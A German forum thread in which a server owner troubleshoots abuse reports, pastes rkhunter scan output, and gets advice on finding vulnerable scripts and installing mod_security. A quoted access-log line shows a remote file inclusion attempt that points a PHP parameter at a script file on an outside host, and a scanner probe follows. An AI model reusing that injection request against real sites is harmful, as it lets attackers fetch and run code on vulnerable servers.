Sicherheitslücke?

[mrairbrush]

Kriege von Hetzner ständig Abusemeldungen aber teilweise ohne Inhalt. Lediglich das jemand Spam gemeldet hätte. Der Traffic hat sich aber nur reinkommend drastisch erhöht. Wo fängt man am besten mit dem Suchen an?
Kann jemand damit was anfangen?

Zitat:

"GET
/include/editfunc.inc.php/?NWCONF_SYSTEM%5bserver_path%5d=http://www.hyonsvc
.co.kr//bbs//icon/1.txt%3f HTTP/1.1" 500 3560 "-" "Mozilla/5.0" - "-"

Was soll das mit URL Injektion?

[Till]

Das sieht ganz danach aus, als ob eines der CMS Systeme oder ähnliches auf Deinem System verwundbar ist.

1) Suche das cms bzw script und aktualisiere es. Du kannst z.B. mit:

locate editfunc.inc.php

nach der datei suchen, um die betroffene website eingrenzen zu können.

2) Scan Dein System mit rkhunter:

http://www.rootkit.nl/projects/rootkit_hunter.html

3) Bei URL Injection könnte Dir auch die Installation vom apache mod_security modul zusätzlichen Schutz bieten.

[mrairbrush]

Der Befehl locate wurde nicht gefunden :-))

rkhunter hat ein paar Sachen gefunden.

Zitat:

/usr/bin/awk [ Warning ]
[11:01:06] Warning: The file properties have changed:
[11:01:06] File: /usr/bin/awk
[11:01:06] Current hash: c7a7da74a87602ded1bff67da0a33eb29a7b42c5


/usr/bin/curl [ Warning ]
[11:01:07] Warning: The file '/usr/bin/curl' exists on the system, but it is not present in the rkhunter.dat file.
[11:01:07] Info: Using the '/usr/bin/sha1sum' command for the file hash checks

Info: The hash function field index is set to 1
[11:01:07] Info: No package manager specified: using hash function '/usr/bin/sha1sum'

Info: Previous file attributes were stored
[11:01:08] Info: Enabled tests are: all
[11:01:08] Info: Disabled tests are: suspscan hidden_procs deleted_files packet_cap_apps
[11:01:08] Info: Found ksym file '/proc/kallsyms'
[11:01:08]
[11:01:08] Checking if the O/S has changed since last time...
[11:01:08] Info: Nothing seems to have changed
[11:01:08]

/usr/bin/GET [ Warning ]
[11:01:09] Warning: The file '/usr/bin/GET' exists on the system, but it is not present in the rkhunter.dat file.

/usr/bin/gawk [ Warning ]
[11:01:21] Warning: The file '/usr/bin/gawk' exists on the system, but it is not present in the rkhunter.dat file.
[11:01:21] /usr/bin/lwp-request [ Warning ]
[11:01:21] Warning: The file '/usr/bin/lwp-request' exists on the system, but it is not present in the rkhunter.dat file.
[11:01:21] Info: Found file '/usr/bin/lwp-request': it is whitelisted for the 'script replacement' check.


/usr/bin/awk [ Warning ]
[11:01:24] Warning: The file properties have changed:
[11:01:24] /sbin/rmmod [ OK ]
[11:01:24] File: /usr/bin/awk
[11:01:24] Current hash: c7a7da74a87602ded1bff67da0a33eb29a7b42c5
[11:01:24] Stored hash : 6ef52de269564cb384eaf63e2ee5f4181f715cbb


/usr/bin/curl [ Warning ]
[11:01:25] Warning: The file '/usr/bin/curl' exists on the system, but it is not present in the rkhunter.dat file.

/usr/bin/GET [ Warning ]
[11:01:27] Warning: The file '/usr/bin/GET' exists on the system, but it is not present in the rkhunter.dat file.


/usr/sbin/unhide [ Warning ]
[11:01:31] Warning: The file '/usr/sbin/unhide' exists on the system, but it is not present in the rkhunter.dat file.

/usr/sbin/unhide-linux26 [ Warning ]
[11:01:33] Warning: The file '/usr/sbin/unhide-linux26' exists on the system, but it is not present in the rkhunter.dat file.


/usr/bin/gawk [ Warning ]



/usr/bin/lwp-request [ Warning ]
[11:01:42] Checking for file '/usr/bin/snfs' [ Not found ]
[11:01:42] Warning: The file '/usr/bin/lwp-request' exists on the system, but it is not present in the rkhunter.dat file.
[11:01:42] Info: Found file '/usr/bin/lwp-request': it is whitelisted for the 'script replacement' check.


/usr/sbin/unhide [ Warning ]
[11:01:49] Warning: The file '/usr/sbin/unhide' exists on the system, but it is not present in the rkhunter.dat file.


/usr/sbin/unhide-linux26 [ Warning ]
[11:01:50] Warning: The file '/usr/sbin/unhide-linux26' exists on the system, but it is not present in the rkhunter.dat file.



Info: Starting test name 'malware'
[11:02:36]
[11:02:36] Info: Test 'deleted_files' disabled at users request.
[11:02:37] Info: Starting test name 'running_procs'
[11:02:37] Checking running processes for suspicious files [ Skipped ]
[11:02:37] Info: Unable to find the 'lsof' command
[11:02:37]
[11:02:37] Info: Test 'hidden_procs' disabled at users request.
[11:02:37]
[11:02:37] Info: Test 'suspscan' disabled at users request.
[11:02:37]


Checking for software intrusions [ Skipped ]
[11:02:38] Info: Check skipped - tripwire not installed
[11:02:38]


Performing check for enabled xinetd services
[11:02:39] Checking for enabled xinetd services [ Skipped ]
[11:02:39] Info: Check skipped - file '/etc/xinetd.conf' does not exist.


Performing check for backdoor ports
[11:02:40] Info: Disabling pathnames and '*' in PORT_WHITELIST setting: no 'lsof' command present.


Info: Found SSH configuration file: /etc/ssh/sshd_config
[11:02:51] Info: Rkhunter option ALLOW_SSH_ROOT_USER set to 'no'.
[11:02:51] Info: Rkhunter option ALLOW_SSH_PROT_V1 set to '0'.
[11:02:51] Checking if SSH root access is allowed [ Warning ]
[11:02:52] Warning: The SSH and rkhunter configuration options should be the same:
[11:02:52] SSH configuration option 'PermitRootLogin': yes
[11:02:52] Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
[11:02:52] Checking if SSH protocol v1 is allowed [ Not allowed ]


Performing filesystem checks
[11:02:53] Info: Starting test name 'filesystem'
[11:02:53] Info: SCAN_MODE_DEV set to 'THOROUGH'



Checking application versions...
[11:02:54] Info: Starting test name 'apps'
[11:02:55] Info: Application 'exim' not found.
[11:02:55] Checking version of GnuPG [ Warning ]
[11:02:55] Warning: Application 'gpg', version '1.4.9', is out of date, and possibly a security risk.
[11:02:55] Info: Application 'httpd' not found.
[11:02:55] Info: Application 'named' not found.
[11:02:55] Checking version of OpenSSL [ Warning ]
[11:02:55] Warning: Application 'openssl', version '0.9.8g', is out of date, and possibly a security risk.
[11:02:55] Checking version of PHP [ Warning ]
[11:02:56] Warning: Application 'php', version '5.2.6', is out of date, and possibly a security risk.
[11:02:56] Info: Application 'procmail' not found.
[11:02:56] Info: Application 'proftpd' not found.
[11:02:56] Checking version of OpenSSH [ Warning ]
[11:02:56] Warning: Application 'sshd', version '5.1p1', is out of date, and possibly a security risk.
[11:02:56] Info: Applications checked: 4 out of 9
[11:02:56]
[11:02:56] System checks summary
[11:02:56] =====================
[11:02:56]
[11:02:56] File properties checks...
[11:02:56] Files checked: 122
[11:02:56] Suspect files: 7
[11:02:56]
[11:02:56] Rootkit checks...
[11:02:56] Rootkits checked : 108
[11:02:56] Possible rootkits: 0
[11:02:57]
[11:02:57] Applications checks...
[11:02:57] Applications checked: 4
[11:02:57] Suspect applications: 4

[mrairbrush]

Versuche gerade den mod_security zu installieren. Aber funktioniert leider nicht so einfach wie beschrieben.
Hänge bei
SecUploadDir /var/log/apache2/modsecurity/tmp
fest

apxs2 ist nicht installiert. Woher bekomme ich das? Suche schon aber habe noch nichts gefunden.

[Till]

Schau mal, ob es apache2 dev Pakete für die von Dir verwendete Linux Distribution gibt und wenn ja, dann installier sie.

[Quest]

Zu locate:
Der Befehl ist in der default Debian Installation nicht dabei.
Such mal in Aptitude nach locate, dann wirst du fündig. Den genauen Paketnamen hab ich leider nicht im Kopf.
Nach der Installation bitte ein mal
updatedb
ausführen um den Suchindex für locate zu aktualisieren.

[mrairbrush]

Verwende das Lenny von Hetzner und isp config
finde bei Hetzner aber nicht leider

[Till]

Locate installieren:

apt-get install findutils

[mrairbrush]

Hatte ein paar Tage Ruhe jetzt gehen die Abusemeldungen wieder los.
HAbe in die Logs gesehen und folgendes häufug gefunden

Zitat:

"GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 377 "-" "-"

[mrairbrush]

Zitat:

Zitat von Till

Locate installieren:

apt-get install findutils

Funktioniert wohl nicht

Zitat:

apt:~# apt-get install findutils
Reading package lists... Done
Building dependency tree
Reading state information... Done
findutils is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 15 not upgraded.
1 not fully installed or removed.
After this operation, 0B of additional disk space will be used.
Setting up phpmyadmin (4:2.11.8.1-5+lenny3) ...
chmod: cannot access `/var/lib/phpmyadmin/config.inc.php': No such file or directory
dpkg: error processing phpmyadmin (--configure):
subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
phpmyadmin
E: Sub-process /usr/bin/dpkg returned an error code (1)
apt:~#